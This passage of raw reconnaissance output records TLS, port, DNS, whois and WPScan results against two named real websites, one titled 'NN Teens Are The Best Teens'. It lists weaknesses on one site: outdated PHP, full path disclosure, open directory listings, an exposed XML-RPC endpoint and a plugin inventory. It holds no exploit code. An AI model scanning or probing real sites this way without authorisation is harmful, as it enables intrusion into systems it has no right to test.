  3515.                CAMELLIA256-SHA256 CAMELLIA128-SHA256 CAMELLIA256-SHA
  3516.                CAMELLIA128-SHA
  3517.  
  3518.  
  3519.  Testing server defaults (Server Hello) 
  3520.  
  3521.  TLS extensions (standard)    "renegotiation info/#65281" "server name/#0"
  3522.                               "EC point formats/#11" "session ticket/#35"
  3523.                               "next protocol/#13172" "encrypt-then-mac/#22"
  3524.                               "extended master secret/#23"
  3525.                               "application layer protocol negotiation/#16"
  3526.  Session Ticket RFC 5077 hint 86400 seconds, session tickets keys seems to be rotated < daily
  3527.  SSL Session ID support       yes
  3528.  Session Resumption           Tickets: yes, ID: yes
  3529.  TLS clock skew               Random values, no fingerprinting possible
  3530.  Signature Algorithm          SHA256 with RSA
  3531.  Server key size              RSA 2048 bits
  3532.  Fingerprint / Serial         SHA1 42DFAF76AB4526AD27EDCAA09216B2BF417D3827 / 03B6337FA382357AD6A03756410B73ABBC31
  3533.                               SHA256 37366C6AF1B1B7FDCDA89E359A4FE45EE926EF6B7992ECBF01CC6F710E2DA4B1
  3534.  Common Name (CN)             allthefallen.ninja
  3535.  subjectAltName (SAN)         allthefallen.ninja www.allthefallen.ninja 
  3536.  Issuer                       Let's Encrypt Authority X3 (Let's Encrypt from US)
  3537.  Trust (hostname)             Ok via SAN and CN (same w/o SNI)
  3538.  Chain of trust               Ok   
  3539.  EV cert (experimental)       no
  3540.  Certificate Expiration       85 >= 30 days (2017-12-16 17:49 --> 2018-03-16 18:49 -0400)
  3541.  # of certificates provided   2
  3542.  Certificate Revocation List  --
  3543.  OCSP URI                     http://ocsp.int-x3.letsencrypt.org
  3544.  OCSP stapling                not offered
  3545.  OCSP must staple             no
  3546.  DNS CAA RR (experimental)    not offered
  3547.  Certificate Transparency     no
  3548.  
  3549.  
  3550.  Testing HTTP header response @ "/" 
  3551.  
  3552.  HTTP Status Code             200 OK
  3553.  HTTP clock skew              -1 sec from localtime
  3554.  Strict Transport Security    365 days=31536000 s, just this domain
  3555.  Public Key Pinning           --
  3556.  Server banner                nginx
  3557.  Application banner           --
  3558.  Cookie(s)                    (none issued at "/")
  3559.  Security headers             X-Frame-Options SAMEORIGIN
  3560.                               X-XSS-Protection 1; mode=block
  3561.                               X-Content-Type-Options nosniff
  3562.  Reverse Proxy banner         --
  3563.  
  3564.  
  3565.  Testing vulnerabilities 
  3566.  
  3567.  Heartbleed (CVE-2014-0160)                not vulnerable (OK), no heartbeat extension
  3568.  CCS (CVE-2014-0224)                       not vulnerable (OK)
  3569.  Ticketbleed (CVE-2016-9244), experiment.  not vulnerable (OK)
  3570.  ROBOT                                     not vulnerable (OK)
  3571.  Secure Renegotiation (CVE-2009-3555)      not vulnerable (OK)
  3572.  Secure Client-Initiated Renegotiation     not vulnerable (OK)
  3573.  CRIME, TLS (CVE-2012-4929)                not vulnerable (OK)
  3574.  BREACH (CVE-2013-3587)                    potentially NOT ok, uses gzip HTTP compression. - only supplied "/" tested
  3575.                                            Can be ignored for static pages or if no secrets in the page
  3576.  POODLE, SSL (CVE-2014-3566)               not vulnerable (OK)
  3577.  TLS_FALLBACK_SCSV (RFC 7507)              Downgrade attack prevention supported (OK)
  3578.  SWEET32 (CVE-2016-2183, CVE-2016-6329)    not vulnerable (OK)
  3579.  FREAK (CVE-2015-0204)                     not vulnerable (OK)
  3580.  DROWN (CVE-2016-0800, CVE-2016-0703)      not vulnerable on this host and port (OK)
  3581.                                            make sure you don't use this certificate elsewhere with SSLv2 enabled services
  3582.                                            https://censys.io/ipv4?q=37366C6AF1B1B7FDCDA89E359A4FE45EE926EF6B7992ECBF01CC6F710E2DA4B1 could help you to find out
  3583.  LOGJAM (CVE-2015-4000), experimental      not vulnerable (OK): no DH EXPORT ciphers, no common primes detected
  3584.  BEAST (CVE-2011-3389)                     TLS1: ECDHE-RSA-AES128-SHA
  3585.                                                  ECDHE-RSA-AES256-SHA
  3586.                                                  DHE-RSA-AES128-SHA
  3587.                                                  DHE-RSA-AES256-SHA AES128-SHA
  3588.                                                  AES256-SHA
  3589.                                                  DHE-RSA-CAMELLIA256-SHA
  3590.                                                  DHE-RSA-CAMELLIA128-SHA
  3591.                                                  CAMELLIA256-SHA
  3592.                                                  CAMELLIA128-SHA 
  3593.                                            VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
  3594.  LUCKY13 (CVE-2013-0169), experimental     potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
  3595.  RC4 (CVE-2013-2566, CVE-2015-2808)        no RC4 ciphers detected (OK)
  3596.  
  3597.  
  3598.  Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength 
  3599.  
  3600. Hexcode  Cipher Suite Name (OpenSSL)       KeyExch.   Encryption  Bits     Cipher Suite Name (RFC)
  3601. -----------------------------------------------------------------------------------------------------------------------------
  3602.  xc030   ECDHE-RSA-AES256-GCM-SHA384       ECDH 256   AESGCM      256      TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384              
  3603.  xc028   ECDHE-RSA-AES256-SHA384           ECDH 256   AES         256      TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384              
  3604.  xc014   ECDHE-RSA-AES256-SHA              ECDH 256   AES         256      TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA                
  3605.  x9f     DHE-RSA-AES256-GCM-SHA384         DH 2048    AESGCM      256      TLS_DHE_RSA_WITH_AES_256_GCM_SHA384                
  3606.  xc0a3   DHE-RSA-AES256-CCM8               DH 2048    AESCCM8     256      TLS_DHE_RSA_WITH_AES_256_CCM_8                    
  3607.  xc09f   DHE-RSA-AES256-CCM                DH 2048    AESCCM      256      TLS_DHE_RSA_WITH_AES_256_CCM                      
  3608.  x6b     DHE-RSA-AES256-SHA256             DH 2048    AES         256      TLS_DHE_RSA_WITH_AES_256_CBC_SHA256                
  3609.  x39     DHE-RSA-AES256-SHA                DH 2048    AES         256      TLS_DHE_RSA_WITH_AES_256_CBC_SHA                  
  3610.  xc077   ECDHE-RSA-CAMELLIA256-SHA384      ECDH 256   Camellia    256      TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384        
  3611.  xc4     DHE-RSA-CAMELLIA256-SHA256        DH 2048    Camellia    256      TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256          
  3612.  x88     DHE-RSA-CAMELLIA256-SHA           DH 2048    Camellia    256      TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA              
  3613.  x9d     AES256-GCM-SHA384                 RSA        AESGCM      256      TLS_RSA_WITH_AES_256_GCM_SHA384                    
  3614.  xc0a1   AES256-CCM8                       RSA        AESCCM8     256      TLS_RSA_WITH_AES_256_CCM_8                        
  3615.  xc09d   AES256-CCM                        RSA        AESCCM      256      TLS_RSA_WITH_AES_256_CCM                          
  3616.  x3d     AES256-SHA256                     RSA        AES         256      TLS_RSA_WITH_AES_256_CBC_SHA256                    
  3617.  x35     AES256-SHA                        RSA        AES         256      TLS_RSA_WITH_AES_256_CBC_SHA                      
  3618.  xc0     CAMELLIA256-SHA256                RSA        Camellia    256      TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256              
  3619.  x84     CAMELLIA256-SHA                   RSA        Camellia    256      TLS_RSA_WITH_CAMELLIA_256_CBC_SHA                  
  3620.  xc02f   ECDHE-RSA-AES128-GCM-SHA256       ECDH 256   AESGCM      128      TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256              
  3621.  xc027   ECDHE-RSA-AES128-SHA256           ECDH 256   AES         128      TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256              
  3622.  xc013   ECDHE-RSA-AES128-SHA              ECDH 256   AES         128      TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA                
  3623.  x9e     DHE-RSA-AES128-GCM-SHA256         DH 2048    AESGCM      128      TLS_DHE_RSA_WITH_AES_128_GCM_SHA256                
  3624.  xc0a2   DHE-RSA-AES128-CCM8               DH 2048    AESCCM8     128      TLS_DHE_RSA_WITH_AES_128_CCM_8                    
  3625.  xc09e   DHE-RSA-AES128-CCM                DH 2048    AESCCM      128      TLS_DHE_RSA_WITH_AES_128_CCM                      
  3626.  xc0a0   AES128-CCM8                       RSA        AESCCM8     128      TLS_RSA_WITH_AES_128_CCM_8                        
  3627.  xc09c   AES128-CCM                        RSA        AESCCM      128      TLS_RSA_WITH_AES_128_CCM                          
  3628.  x67     DHE-RSA-AES128-SHA256             DH 2048    AES         128      TLS_DHE_RSA_WITH_AES_128_CBC_SHA256                
  3629.  x33     DHE-RSA-AES128-SHA                DH 2048    AES         128      TLS_DHE_RSA_WITH_AES_128_CBC_SHA                  
  3630.  xc076   ECDHE-RSA-CAMELLIA128-SHA256      ECDH 256   Camellia    128      TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256        
  3631.  xbe     DHE-RSA-CAMELLIA128-SHA256        DH 2048    Camellia    128      TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256          
  3632.  x45     DHE-RSA-CAMELLIA128-SHA           DH 2048    Camellia    128      TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA              
  3633.  x9c     AES128-GCM-SHA256                 RSA        AESGCM      128      TLS_RSA_WITH_AES_128_GCM_SHA256                    
  3634.  x3c     AES128-SHA256                     RSA        AES         128      TLS_RSA_WITH_AES_128_CBC_SHA256                    
  3635.  x2f     AES128-SHA                        RSA        AES         128      TLS_RSA_WITH_AES_128_CBC_SHA                      
  3636.  xba     CAMELLIA128-SHA256                RSA        Camellia    128      TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256              
  3637.  x41     CAMELLIA128-SHA                   RSA        Camellia    128      TLS_RSA_WITH_CAMELLIA_128_CBC_SHA                  
  3638.  
  3639.  
  3640.  Running client simulations via sockets 
  3641.  
  3642.  Android 2.3.7                TLSv1.0 DHE-RSA-AES128-SHA, 2048 bit DH
  3643.  Android 4.1.1                TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  3644.  Android 4.3                  TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  3645.  Android 4.4.2                TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3646.  Android 5.0.0                TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3647.  Android 6.0                  TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3648.  Android 7.0                  TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
  3649.  Chrome 51 Win 7              TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
  3650.  Chrome 57 Win 7              TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
  3651.  Firefox 49 Win 7             TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3652.  Firefox 53 Win 7             TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 253 bit ECDH (X25519)
  3653.  IE 6 XP                      No connection
  3654.  IE 7 Vista                   TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  3655.  IE 8 XP                      No connection
  3656.  IE 8 Win 7                   TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  3657.  IE 11 Win 7                  TLSv1.2 DHE-RSA-AES128-GCM-SHA256, 2048 bit DH
  3658.  IE 11 Win 8.1                TLSv1.2 DHE-RSA-AES128-GCM-SHA256, 2048 bit DH
  3659.  IE 11 Win Phone 8.1 Update   TLSv1.2 DHE-RSA-AES128-GCM-SHA256, 2048 bit DH
  3660.  IE 11 Win 10                 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3661.  Edge 13 Win 10               TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3662.  Edge 13 Win Phone 10         TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3663.  Opera 17 Win 7               TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  3664.  Safari 5.1.9 OS X 10.6.8     TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  3665.  Safari 7 iOS 7.1             TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  3666.  Safari 9 OS X 10.11          TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3667.  Safari 10 OS X 10.12         TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3668.  Apple ATS 9 iOS 9            TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3669.  Tor 17.0.9 Win 7             TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  3670.  Java 6u45                    No connection
  3671.  Java 7u25                    TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  3672.  Java 8u31                    TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3673.  OpenSSL 1.0.1l               TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3674.  OpenSSL 1.0.2e               TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3675.  
  3676.  Done 2017-12-21 14:34:26 [ 355s] -->> 178.132.1.137:443 (allthefallen.ninja) <<--
  3677. ######################################################################################################################################
  3678. Nom de l'hôte  www.nnhoney.com         FAI     Inconnu
  3679. Continent   Inconnu         Drapeau    
  3680. US
  3681. Pays    Etats-Unis d'Amérique      Code du pays    US
  3682. Région     Inconnu         Heure locale    21 Dec 2017 15:17 CST
  3683. Ville   Inconnu         Latitude    37.751
  3684. Adresse IP (IPv6)   2400:cb00:2048:1::6812:24c4         Longitude   -97.822
  3685. #######################################################################################################################################
  3686. [i] Scanning Site: https://nnhoney.com
  3687.  
  3688.  
  3689.  
  3690. B A S I C   I N F O
  3691. ====================
  3692.  
  3693.  
  3694. [+] Site Title: NN Honey - NN Teens Are The Best Teens
  3695. [+] IP address: 104.18.37.196
  3696. [+] Web Server: cloudflare
  3697. [+] CMS: WordPress
  3698. [+] Cloudflare: Detected
  3699. [+] Robots File: Found
  3700.  
  3701. -------------[ contents ]----------------  
  3702. User-agent: *
  3703. Disallow: /wp-admin/
  3704. Allow: /wp-admin/admin-ajax.php
  3705.  
  3706. -----------[end of contents]-------------
  3707.  
  3708.  
  3709.  
  3710. W H O I S   L O O K U P
  3711. ========================
  3712.  
  3713.        Domain Name: NNHONEY.COM
  3714.    Registry Domain ID: 144391280_DOMAIN_COM-VRSN
  3715.    Registrar WHOIS Server: whois.enom.com
  3716.    Registrar URL: http://www.enom.com
  3717.    Updated Date: 2017-11-27T21:01:56Z
  3718.    Creation Date: 2005-02-28T15:40:53Z
  3719.    Registry Expiry Date: 2018-02-28T15:40:53Z
  3720.    Registrar: eNom, Inc.
  3721.    Registrar IANA ID: 48
  3722.    Registrar Abuse Contact Email:
  3723.    Registrar Abuse Contact Phone:
  3724.    Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  3725.    Name Server: IAN.NS.CLOUDFLARE.COM
  3726.    Name Server: POLA.NS.CLOUDFLARE.COM
  3727.    DNSSEC: unsigned
  3728.    URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  3729. >>> Last update of whois database: 2017-12-21T21:21:28Z <<<
  3730.  
  3731. For more information on Whois status codes, please visit https://icann.org/epp
  3732.  
  3733. NOTICE: The expiration date displayed in this record is the date the
  3734. registrar's sponsorship of the domain name registration in the registry is
  3735. currently set to expire. This date does not necessarily reflect the expiration
  3736. date of the domain name registrant's agreement with the sponsoring
  3737. registrar.  Users may consult the sponsoring registrar's Whois database to
  3738. view the registrar's reported date of expiration for this registration.
  3739.  
  3740.  
  3741. The Registry database contains ONLY .COM, .NET, .EDU domains and
  3742. Registrars.
  3743.  
  3744.  
  3745.  
  3746.  
  3747. G E O  I P  L O O K  U P
  3748. =========================
  3749.  
  3750. [i] IP Address: 104.18.37.196
  3751. [i] Country: US
  3752. [i] State: N/A
  3753. [i] City: N/A
  3754. [i] Latitude: 37.750999
  3755. [i] Longitude: -97.821999
  3756.  
  3757.  
  3758.  
  3759.  
  3760. H T T P   H E A D E R S
  3761. =======================
  3762.  
  3763.  
  3764. [i]  HTTP/1.1 301 Moved Permanently
  3765. [i]  Date: Thu, 21 Dec 2017 21:22:05 GMT
  3766. [i]  Content-Type: text/html; charset=UTF-8
  3767. [i]  Connection: close
  3768. [i]  Set-Cookie: __cfduid=dba9976e9cfeeac96ec329ffaf4e66d461513891322; expires=Fri, 21-Dec-18 21:22:02 GMT; path=/; domain=.nnhoney.com; HttpOnly
  3769. [i]  X-Powered-By: PHP/5.6.32
  3770. [i]  Set-Cookie: wfvt_1470590672=5a3c25fe7d152; expires=Thu, 21-Dec-2017 21:52:06 GMT; Max-Age=1800; path=/; secure; httponly
  3771. [i]  Location: https://www.nnhoney.com/
  3772. [i]  Server: cloudflare
  3773. [i]  CF-RAY: 3d0de4ff5f9f2198-EWR
  3774. [i]  HTTP/1.1 200 OK
  3775. [i]  Date: Thu, 21 Dec 2017 21:22:15 GMT
  3776. [i]  Content-Type: text/html; charset=UTF-8
  3777. [i]  Connection: close
  3778. [i]  Set-Cookie: __cfduid=d114d6100e7aa5f8751432c2bdfb986f51513891333; expires=Fri, 21-Dec-18 21:22:13 GMT; path=/; domain=.nnhoney.com; HttpOnly
  3779. [i]  X-Powered-By: PHP/5.6.32
  3780. [i]  Link: <https://www.nnhoney.com/wp-json/>; rel="https://api.w.org/"
  3781. [i]  Set-Cookie: wfvt_1470590672=5a3c26079278a; expires=Thu, 21-Dec-2017 21:52:15 GMT; Max-Age=1800; path=/; secure; httponly
  3782. [i]  Vary: Accept-Encoding
  3783. [i]  Server: cloudflare
  3784. [i]  CF-RAY: 3d0de5441e7821ec-EWR
  3785.  
  3786.  
  3787.  
  3788.  
  3789. D N S   L O O K U P
  3790. ===================
  3791.  
  3792. nnhoney.com.        3788    IN  HINFO   "ANY obsoleted" "See draft-ietf-dnsop-refuse-any"
  3793.  
  3794.  
  3795.  
  3796.  
  3797. S U B N E T   C A L C U L A T I O N
  3798. ====================================
  3799.  
  3800. Address       = 2400:cb00:2048:1::6812:24c4
  3801. Network       = 2400:cb00:2048:1::6812:24c4 / 128
  3802. Netmask       = ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
  3803. Wildcard Mask = ::
  3804. Hosts Bits    = 0
  3805. Max. Hosts    = 0   (2^0 - 1)
  3806. Host Range    = { 2400:cb00:2048:1::6812:24c5 - 2400:cb00:2048:1::6812:24c4 }
  3807.  
  3808.  
  3809.  
  3810. N M A P   P O R T   S C A N
  3811. ============================
  3812.  
  3813.  
  3814. Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-21 21:22 UTC
  3815. Nmap scan report for nnhoney.com (104.18.36.196)
  3816. Host is up (0.0023s latency).
  3817. Other addresses for nnhoney.com (not scanned): 104.18.37.196 2400:cb00:2048:1::6812:24c4 2400:cb00:2048:1::6812:25c4
  3818. PORT     STATE    SERVICE       VERSION
  3819. 21/tcp   filtered ftp
  3820. 22/tcp   filtered ssh
  3821. 23/tcp   filtered telnet
  3822. 25/tcp   filtered smtp
  3823. 80/tcp   open     http          Cloudflare nginx
  3824. 110/tcp  filtered pop3
  3825. 143/tcp  filtered imap
  3826. 443/tcp  open     ssl/http      Cloudflare nginx
  3827. 445/tcp  filtered microsoft-ds
  3828. 3389/tcp filtered ms-wbt-server
  3829. | Domain: http://nnhoney.com/
  3830. | Server: cloudflare
  3831. | IP: 104.18.37.196
  3832. ===================================================================================================
  3833. ===================================================================================================
  3834. | PING
  3835. |
  3836. | PING nnhoney.com(2400:cb00:2048:1::6812:24c4 (2400:cb00:2048:1::6812:24c4)) 56 data bytes
  3837. | 64 bytes from 2400:cb00:2048:1::6812:24c4: icmp_seq=1 ttl=60 time=28.9 ms
  3838. |
  3839. | --- nnhoney.com ping statistics ---
  3840. | 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  3841. | rtt min/avg/max/mdev = 28.947/28.947/28.947/0.000 ms
  3842. ===================================================================================================
  3843. | TRACEROUTE
  3844. |
  3845. | traceroute to nnhoney.com (104.18.37.196), 30 hops max, 60 byte packets
  3846. |  1  10.13.0.1 (10.13.0.1)  108.393 ms  109.456 ms  109.940 ms
  3847. |  2  37.187.24.253 (37.187.24.253)  109.976 ms  216.691 ms  216.655 ms
  3848. |  3  10.50.225.60 (10.50.225.60)  109.848 ms 10.50.225.61 (10.50.225.61)  109.840 ms  109.831 ms
  3849. |  4  10.17.129.46 (10.17.129.46)  216.539 ms 10.17.129.44 (10.17.129.44)  216.498 ms 10.17.129.40 (10.17.129.40)  216.481 ms
  3850. |  5  10.73.0.54 (10.73.0.54)  109.975 ms 10.73.0.52 (10.73.0.52)  109.912 ms 10.73.0.50 (10.73.0.50)  109.909 ms
  3851. |  6  * * *
  3852. |  7  be100-1112.ams-5-a9.nl.eu (213.251.128.67)  1920.775 ms  1954.273 ms  2010.084 ms
  3853. |  8  ams-ix.as13335.net (80.249.211.140)  2010.183 ms  2010.230 ms  2010.186 ms
  3854. |  9  104.18.37.196 (104.18.37.196)  1926.676 ms  1937.693 ms  1948.654 ms
  3855. ===================================================================================================
  3856. | NSLOOKUP
  3857. |
  3858. | Server:       2001:568:ff09:10c::53
  3859. | Address:  2001:568:ff09:10c::53#53
  3860. |
  3861. | Non-authoritative answer:
  3862. | *** Can't find nnhoney.com: No answer
  3863. | Authoritative answers can be found from:
  3864. | nnhoney.com
  3865. |   origin = ian.ns.cloudflare.com
  3866. |   mail addr = dns.cloudflare.com
  3867. |   serial = 2026348318
  3868. |   refresh = 10000
  3869. |   retry = 2400
  3870. |   expire = 604800
  3871. |   minimum = 3600
  3872. | nnhoney.com   nameserver = pola.ns.cloudflare.com.
  3873. | nnhoney.com   nameserver = ian.ns.cloudflare.com.
  3874. | Name: nnhoney.com
  3875. | Address: 104.18.36.196
  3876. | Address: 104.18.37.196
  3877. | nnhoney.com   hinfo = "ANY obsoleted" "See draft-ietf-dnsop-refuse-any"
  3878. | Address: 2400:cb00:2048:1::6812:25c4
  3879. | Address: 2400:cb00:2048:1::6812:24c4
  3880. ===================================================================================================
  3881. | NMAP
  3882. |
  3883. |
  3884. | Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-21 16:23 EST
  3885. | NSE: Loaded 146 scripts for scanning.
  3886. | NSE: Script Pre-scanning.
  3887. | Initiating NSE at 16:23
  3888. | Completed NSE at 16:23, 0.00s elapsed
  3889. | Initiating NSE at 16:23
  3890. | Completed NSE at 16:23, 0.00s elapsed
  3891. | Initiating Ping Scan at 16:23
  3892. | Scanning nnhoney.com (104.18.36.196) [4 ports]
  3893. | Completed Ping Scan at 16:23, 3.04s elapsed (1 total hosts)
  3894. | Nmap scan report for nnhoney.com (104.18.36.196) [host down]
  3895. | Other addresses for nnhoney.com (not scanned): 2400:cb00:2048:1::6812:24c4 2400:cb00:2048:1::6812:25c4 104.18.37.196
  3896. | NSE: Script Post-scanning.
  3897. | Initiating NSE at 16:23
  3898. | Completed NSE at 16:23, 0.00s elapsed
  3899. | Initiating NSE at 16:23
  3900. | Completed NSE at 16:23, 0.00s elapsed
  3901. | Read data files from: /usr/bin/../share/nmap
  3902. | Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
  3903. | Nmap done: 1 IP address (0 hosts up) scanned in 11.51 seconds
  3904. |            Raw packets sent: 8 (304B) | Rcvd: 0 (0B)
  3905. ===================================================================================================
  3906. ===================================================================================================
  3907. Scan end date: 21-12-2017 16:23:59
  3908. [!] IP Address : 104.18.36.196
  3909. [-] Cloudflare detected
  3910. [!] Powered By: PHP/5.6.32
  3911. [-] Clickjacking protection is not in place.
  3912. [!] CMS Detected : WordPress
  3913. [?] Would you like to use WPScan? [Y/n] Y
  3914. _______________________________________________________________
  3915.         __          _______   _____                  
  3916.         \ \        / /  __ \ / ____|                
  3917.          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
  3918.           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
  3919.            \  /\  /  | |     ____) | (__| (_| | | | |
  3920.             \/  \/   |_|    |_____/ \___|\__,_|_| |_|
  3921.  
  3922.         WordPress Security Scanner by the WPScan Team
  3923.                        Version 2.9.3
  3924.           Sponsored by Sucuri - https://sucuri.net
  3925.    @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
  3926. _______________________________________________________________
  3927.  
  3928. [i] The remote host tried to redirect to: https://www.nnhoney.com/
  3929. [?] Do you want follow the redirection ? [Y]es [N]o [A]bort, default: [N]Y
  3930. [+] URL: https://www.nnhoney.com/
  3931. [+] Started: Thu Dec 21 16:23:58 2017
  3932.  
  3933. [+] robots.txt available under: 'https://www.nnhoney.com/robots.txt'
  3934. [+] Interesting entry from robots.txt: https://www.nnhoney.com/wp-admin/admin-ajax.php
  3935. [!] The WordPress 'https://www.nnhoney.com/readme.html' file exists exposing a version number
  3936. [!] Full Path Disclosure (FPD) in 'https://www.nnhoney.com/wp-includes/rss-functions.php':
  3937. [+] Interesting header: CF-RAY: 3d0de869bd0321ec-EWR
  3938. [+] Interesting header: LINK: <https://www.nnhoney.com/wp-json/>; rel="https://api.w.org/"
  3939. [+] Interesting header: SERVER: cloudflare
  3940. [+] Interesting header: SET-COOKIE: wfvt_1470590672=5a3c26885ba38; expires=Thu, 21-Dec-2017 21:54:24 GMT; Max-Age=1800; path=/; secure; httponly
  3941. [+] Interesting header: X-POWERED-BY: PHP/5.6.32
  3942. [+] XML-RPC Interface available under: https://www.nnhoney.com/xmlrpc.php
  3943. [!] Upload directory has directory listing enabled: https://www.nnhoney.com/wp-content/uploads/
  3944. [!] Includes directory has directory listing enabled: https://www.nnhoney.com/wp-includes/
  3945.  
  3946. [+] WordPress version 4.9.1 (Released on 2017-11-29) identified from advanced fingerprinting, meta generator, links opml
  3947.  
  3948. [+] WordPress theme in use: ipin - v2.0
  3949.  
  3950. [+] Name: ipin - v2.0
  3951.  |  Location: https://www.nnhoney.com/wp-content/themes/ipin/
  3952.  |  Style URL: https://www.nnhoney.com/wp-content/themes/ipin/style.css
  3953.  |  Theme Name: iPin
  3954.  |  Theme URI: http://ericulous.com/2012/09/21/wp-theme-ipin-pinterest-clone/
  3955.  |  Description: Pinterest inspired design
  3956.  |  Author: Genkisan
  3957.  |  Author URI: http://ericulous.com/
  3958.  
  3959. [+] Enumerating plugins from passive detection ...
  3960.  | 7 plugins found:
  3961.  
  3962. [+] Name: add-to-any - v1.7.22
  3963.  |  Latest version: 1.7.22 (up to date)
  3964.  |  Last updated: 2017-11-22T02:26:00.000Z
  3965.  |  Location: https://www.nnhoney.com/wp-content/plugins/add-to-any/
  3966.  |  Readme: https://www.nnhoney.com/wp-content/plugins/add-to-any/README.txt
  3967. [!] Directory listing is enabled: https://www.nnhoney.com/wp-content/plugins/add-to-any/
  3968.  
  3969. [+] Name: buddypress - v2.9.2
  3970.  |  Latest version: 2.9.2 (up to date)
  3971.  |  Last updated: 2017-11-02T16:26:00.000Z
  3972.  |  Location: https://www.nnhoney.com/wp-content/plugins/buddypress/
  3973.  |  Readme: https://www.nnhoney.com/wp-content/plugins/buddypress/readme.txt
  3974. [!] Directory listing is enabled: https://www.nnhoney.com/wp-content/plugins/buddypress/
  3975.  
  3976. [+] Name: post-ratings - v3.0
  3977.  |  Latest version: 3.0 (up to date)
  3978.  |  Last updated: 2016-05-12T12:38:00.000Z
  3979.  |  Location: https://www.nnhoney.com/wp-content/plugins/post-ratings/
  3980.  |  Readme: https://www.nnhoney.com/wp-content/plugins/post-ratings/readme.txt
  3981. [!] Directory listing is enabled: https://www.nnhoney.com/wp-content/plugins/post-ratings/
  3982.  
  3983. [+] Name: q2w3-fixed-widget - v5.0.4
  3984.  |  Latest version: 5.0.4 (up to date)
  3985.  |  Last updated: 2016-09-28T11:29:00.000Z
  3986.  |  Location: https://www.nnhoney.com/wp-content/plugins/q2w3-fixed-widget/
  3987.  |  Readme: https://www.nnhoney.com/wp-content/plugins/q2w3-fixed-widget/readme.txt
  3988. [!] Directory listing is enabled: https://www.nnhoney.com/wp-content/plugins/q2w3-fixed-widget/
  3989.  
  3990. [+] Name: user-submitted-posts - v20171105
  3991.  |  Latest version: 20171105 (up to date)
  3992.  |  Last updated: 2017-11-06T01:02:00.000Z
  3993.  |  Location: https://www.nnhoney.com/wp-content/plugins/user-submitted-posts/
  3994.  |  Readme: https://www.nnhoney.com/wp-content/plugins/user-submitted-posts/readme.txt
  3995.  |  Changelog: https://www.nnhoney.com/wp-content/plugins/user-submitted-posts/changelog.txt
  3996. [!] Directory listing is enabled: https://www.nnhoney.com/wp-content/plugins/user-submitted-posts/
  3997.  
  3998. [+] Name: wordpress-seo - v6.0
  3999.  |  Latest version: 5.9.1 (up to date)
  4000.  |  Last updated: 2017-12-05T11:24:00.000Z
  4001.  |  Location: https://www.nnhoney.com/wp-content/plugins/wordpress-seo/
  4002.  |  Readme: https://www.nnhoney.com/wp-content/plugins/wordpress-seo/readme.txt
  4003.  
  4004. [+] Name: w3-total-cache - v0.9.6
  4005.  |  Latest version: 0.9.5.4 (up to date)
  4006.  |  Last updated: 2017-04-26T20:57:00.000Z
  4007.  |  Location: https://www.nnhoney.com/wp-content/plugins/w3-total-cache/
  4008.  |  Readme: https://www.nnhoney.com/wp-content/plugins/w3-total-cache/readme.txt
